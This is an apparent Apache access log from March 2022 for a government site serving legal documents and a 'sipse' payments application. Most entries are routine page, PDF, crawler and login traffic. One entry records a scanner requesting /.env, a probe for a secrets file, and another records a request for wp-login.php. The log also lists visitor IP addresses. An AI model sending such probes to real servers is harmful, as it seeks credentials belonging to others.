172.22.2.4 - - [29/Mar/2022:04:58:20 -0500] "GET /BLA/boletinlegal/wp-login.php HTTP/1.1" 404 1038
172.22.2.4 - - [29/Mar/2022:04:56:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:04:57:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
172.22.2.4 - - [29/Mar/2022:04:59:39 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9555
207.46.13.235 - - [29/Mar/2022:05:00:52 -0500] "-" 408 -
216.245.221.92 - - [29/Mar/2022:05:01:09 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [29/Mar/2022:05:01:57 -0500] "-" 408 -
201.245.192.253 - - [29/Mar/2022:05:01:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109401
172.22.2.4 - - [29/Mar/2022:05:03:46 -0500] "GET /BLA/boletinlegal/circulares/2017/circular%20no.%201%20del%2030%20de%20marzo%20de%202017.pdf HTTP/1.1" 200 668532
172.22.2.4 - - [29/Mar/2022:05:02:33 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:05:03:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57542
172.22.2.4 - - [29/Mar/2022:05:05:48 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-035-16.docx HTTP/1.1" 200 25011
216.245.221.92 - - [29/Mar/2022:05:06:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:05:08:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:05:09:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [29/Mar/2022:05:11:09 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [29/Mar/2022:05:13:12 -0500] "-" 408 -
201.245.192.253 - - [29/Mar/2022:05:13:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109410
172.22.2.4 - - [29/Mar/2022:05:14:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2022:05:16:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:05:15:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58006
172.22.2.4 - - [29/Mar/2022:05:17:31 -0500] "GET /BLA/boletinlegal/circulares/2019/circular%20no.%2012%20del%2014%20de%20marzo%20de%202019.pdf HTTP/1.1" 200 344384
40.77.167.46 - - [29/Mar/2022:05:18:37 -0500] "GET /pdc/actos/183.pdf HTTP/1.1" 304 -
5.255.253.106 - - [29/Mar/2022:05:18:49 -0500] "-" 408 -
5.255.253.174 - - [29/Mar/2022:05:18:54 -0500] "-" 408 -
5.45.207.133 - - [29/Mar/2022:05:19:00 -0500] "-" 408 -
87.250.224.175 - - [29/Mar/2022:05:19:05 -0500] "-" 408 -
87.250.224.4 - - [29/Mar/2022:05:19:20 -0500] "-" 408 -
213.180.203.85 - - [29/Mar/2022:05:19:35 -0500] "-" 408 -
87.250.224.58 - - [29/Mar/2022:05:20:05 -0500] "-" 408 -
5.255.253.112 - - [29/Mar/2022:05:21:05 -0500] "-" 408 -
216.245.221.92 - - [29/Mar/2022:05:21:09 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:05:20:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45453
172.22.2.4 - - [29/Mar/2022:05:20:03 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
87.250.224.52 - - [29/Mar/2022:05:22:05 -0500] "-" 408 -
201.245.192.253 - - [29/Mar/2022:05:21:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43070
201.245.192.253 - - [29/Mar/2022:05:21:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109410
172.22.2.4 - - [29/Mar/2022:05:20:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
172.22.2.4 - - [29/Mar/2022:05:23:41 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8258
213.180.203.82 - - [29/Mar/2022:05:24:05 -0500] "-" 408 -
173.252.95.9 - - [29/Mar/2022:05:24:54 -0500] "GET /images/jornada-llantaton-usaquen-bosa-25-marzo.jpg HTTP/1.1" 200 60391
216.245.221.92 - - [29/Mar/2022:05:26:09 -0500] "HEAD / HTTP/1.1" 200 -
87.250.224.195 - - [29/Mar/2022:05:27:05 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:05:25:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:05:28:10 -0500] "GET /BLA/boletinlegal/circulares/2021/circular%20no.%2000007%20del%2010%20de%20agosto%20del%202021.pdf HTTP/1.1" 200 266364
172.22.2.4 - - [29/Mar/2022:05:26:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
172.22.2.4 - - [29/Mar/2022:05:29:11 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8258
66.249.73.127 - - [29/Mar/2022:05:29:30 -0500] "-" 408 -
181.56.41.133 - - [29/Mar/2022:05:29:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 200 466582
181.56.41.133 - - [29/Mar/2022:05:29:54 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [29/Mar/2022:05:30:34 -0500] "GET /BLA/boletinlegal/circulares/2019/circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 200 158030
172.22.2.4 - - [29/Mar/2022:05:30:43 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20sentencia%20c%20401%20de%202010.doc HTTP/1.1" 200 34816
216.245.221.92 - - [29/Mar/2022:05:31:09 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:05:30:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45453
201.245.192.253 - - [29/Mar/2022:05:31:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43070
201.245.192.253 - - [29/Mar/2022:05:31:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109410
172.22.2.4 - - [29/Mar/2022:05:33:01 -0500] "GET /BLA/boletinlegal/directivas/2014/directiva%20no.%202%20del%205%20de%20mayo%20de%202014.pdf HTTP/1.1" 200 591315
172.22.2.4 - - [29/Mar/2022:05:31:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:05:32:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49344
172.22.2.4 - - [29/Mar/2022:05:32:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50602
172.22.2.4 - - [29/Mar/2022:05:35:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
216.245.221.92 - - [29/Mar/2022:05:36:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:05:37:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:05:38:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [29/Mar/2022:05:41:09 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:05:40:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45453
201.245.192.253 - - [29/Mar/2022:05:41:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109410
201.245.192.253 - - [29/Mar/2022:05:41:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43070
40.77.167.78 - - [29/Mar/2022:05:44:01 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [29/Mar/2022:05:43:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [29/Mar/2022:05:45:48 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:05:44:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
216.245.221.92 - - [29/Mar/2022:05:46:09 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.23 - - [29/Mar/2022:05:47:07 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:05:49:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2022:05:51:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:05:50:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
201.245.192.253 - - [29/Mar/2022:05:53:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109410
172.22.2.4 - - [29/Mar/2022:05:54:24 -0500] "GET /BLA/boletinlegal/directivas/2014/directiva%20no.%201%20del%2010%20de%20abril%20de%202014.pdf HTTP/1.1" 200 258865
216.245.221.92 - - [29/Mar/2022:05:56:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:05:56:39 -0500] "GET /BLA/boletinlegal/directivas/2016/directiva%20no.%2004%20del%2023%20de%20diciembre%20de%202016.pdf HTTP/1.1" 200 327098
172.22.2.4 - - [29/Mar/2022:05:55:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.179 - - [29/Mar/2022:05:57:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2008%2F HTTP/1.1" 200 976272
172.22.2.4 - - [29/Mar/2022:05:55:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46458
186.102.76.61 - - [29/Mar/2022:05:59:52 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
216.245.221.92 - - [29/Mar/2022:06:01:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:06:00:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:06:02:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109410
172.22.2.4 - - [29/Mar/2022:06:01:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
173.252.111.2 - - [29/Mar/2022:06:04:59 -0500] "GET /images/culebra-sabanera-bogota-26-marzo.jpg HTTP/1.1" 200 22555
66.249.73.100 - - [29/Mar/2022:06:05:59 -0500] "-" 408 -
216.245.221.92 - - [29/Mar/2022:06:06:09 -0500] "HEAD / HTTP/1.1" 200 -
109.237.103.123 - - [29/Mar/2022:06:06:21 -0500] "GET /.env HTTP/1.1" 404 1018
172.22.2.4 - - [29/Mar/2022:06:06:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:06:08:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [29/Mar/2022:06:07:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54090
172.22.2.4 - - [29/Mar/2022:06:09:13 -0500] "GET /BLA/boletinlegal/circulares/2017/circular%20no.%2007%20del%2028%20de%20abril%20de%202017.pdf HTTP/1.1" 200 309906
172.22.2.4 - - [29/Mar/2022:06:10:17 -0500] "GET /BLA/boletinlegal/directivas/2011/directiva%20no.%209%20del%2023%20de%20septiembre%20de%202011.pdf HTTP/1.1" 200 326687
216.245.221.92 - - [29/Mar/2022:06:11:09 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:06:12:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109434
172.22.2.4 - - [29/Mar/2022:06:12:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:06:13:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
216.245.221.92 - - [29/Mar/2022:06:16:09 -0500] "HEAD / HTTP/1.1" 200 -
35.233.62.116 - - [29/Mar/2022:06:19:26 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [29/Mar/2022:06:18:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:06:19:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58006
216.245.221.92 - - [29/Mar/2022:06:21:09 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:06:20:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45312
173.252.111.118 - - [29/Mar/2022:06:21:29 -0500] "GET /images/culebra-sabanera-bogota-26-marzo.jpg HTTP/1.1" 200 22555
201.245.192.253 - - [29/Mar/2022:06:21:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43094
201.245.192.253 - - [29/Mar/2022:06:22:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109434
173.252.107.15 - - [29/Mar/2022:06:23:51 -0500] "GET /images/culebra-sabanera-bogota-26-marzo.jpg HTTP/1.1" 200 22555
69.63.184.2 - - [29/Mar/2022:06:25:49 -0500] "GET /images/jornada-llantaton-usaquen-24-marzo.jpg HTTP/1.1" 200 41830
172.22.2.4 - - [29/Mar/2022:06:24:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [29/Mar/2022:06:26:09 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.24 - - [29/Mar/2022:06:26:12 -0500] "GET /images/cronica-ambiental-28.jpg HTTP/1.1" 200 50693
172.22.2.4 - - [29/Mar/2022:06:26:36 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
172.22.2.4 - - [29/Mar/2022:06:25:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
172.22.2.4 - - [29/Mar/2022:06:27:54 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9555
172.22.2.4 - - [29/Mar/2022:06:27:55 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [29/Mar/2022:06:27:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
66.249.73.97 - - [29/Mar/2022:06:28:54 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:06:29:53 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9555
172.22.2.4 - - [29/Mar/2022:06:30:09 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=1996&resuelve= HTTP/1.1" 200 15262
172.22.2.4 - - [29/Mar/2022:06:29:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53195
103.178.236.95 - - [29/Mar/2022:06:30:33 -0500] "GET / HTTP/1.1" 200 319
34.91.154.113 - - [29/Mar/2022:06:30:57 -0500] "GET / HTTP/1.1" 200 319
181.61.164.108 - - [29/Mar/2022:06:31:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201996/0094.pdf HTTP/1.1" 200 142519
216.245.221.92 - - [29/Mar/2022:06:31:09 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Mar/2022:06:30:37 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45312
172.22.2.4 - - [29/Mar/2022:06:31:42 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=resoluciones&no=&usuario=&sector=&fecha=2000&resuelve= HTTP/1.1" 200 28042
172.22.2.4 - - [29/Mar/2022:06:30:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.237.42.244 - - [29/Mar/2022:06:31:51 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
201.245.192.253 - - [29/Mar/2022:06:31:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43094
172.22.2.4 - - [29/Mar/2022:06:30:53 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
201.245.192.253 - - [29/Mar/2022:06:31:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109434
157.55.39.218 - - [29/Mar/2022:06:32:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1865.pdf HTTP/1.1" 304 -
181.237.42.244 - - [29/Mar/2022:06:33:01 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
181.237.42.244 - - [29/Mar/2022:06:34:28 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
66.249.73.127 - - [29/Mar/2022:06:35:33 -0500] "-" 408 -
181.237.42.244 - - [29/Mar/2022:06:35:33 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1132
216.245.221.92 - - [29/Mar/2022:06:36:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:06:35:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:06:36:43 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [29/Mar/2022:06:41:09 -0500] "HEAD / HTTP/1.1" 200 -
205.169.39.78 - - [29/Mar/2022:06:41:19 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
205.169.39.78 - - [29/Mar/2022:06:41:24 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [29/Mar/2022:06:40:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45312
201.245.192.253 - - [29/Mar/2022:06:41:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43094
201.245.192.253 - - [29/Mar/2022:06:42:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 109434
172.22.2.4 - - [29/Mar/2022:06:41:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [29/Mar/2022:06:43:51 -0500] "-" 408 -
172.22.2.4 - - [29/Mar/2022:06:42:33 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48120
216.245.221.92 - - [29/Mar/2022:06:46:09 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Mar/2022:06:47:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.84.89.166 - - [29/Mar/2022:06:49:19 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.84.89.166 - - [29/Mar/2022:06:49:19 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
186.84.89.166 - - [29/Mar/2022:06:49:19 -0500] "GET /BLA/resoluciones/dlf/folder.png HTTP/1.1" 200 410
186.84.89.166 - - [29/Mar/2022:06:49:19 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
186.84.89.166 - - [29/Mar/2022:06:49:19 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
65.154.226.168 - - [29/Mar/2022:06:49:23 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
65.154.226.168 - - [29/Mar/2022:06:49:23 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
65.154.226.168 - - [29/Mar/2022:06:49:23 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
201.245.192.253 - - [29/Mar/2022:06:49:41 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
201.245.192.253 - - [29/Mar/2022:06:49:41 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:42 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:44 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11188
201.245.192.253 - - [29/Mar/2022:06:49:44 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:45 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:45 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:45 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:47 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 5624
201.245.192.253 - - [29/Mar/2022:06:49:48 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 15035
201.245.192.253 - - [29/Mar/2022:06:49:48 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:48 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:48 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:49 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
201.245.192.253 - - [29/Mar/2022:06:49:50 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:50 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 3843
201.245.192.253 - - [29/Mar/2022:06:49:51 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 33847
201.245.192.253 - - [29/Mar/2022:06:49:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/solicitudProcesoOtrosPagos.xhtml HTTP/1.1" 200 59376
201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "GET /sipse/faces/javax.faces.resource/fileupload/fileupload.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [29/Mar/2022:06:49:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
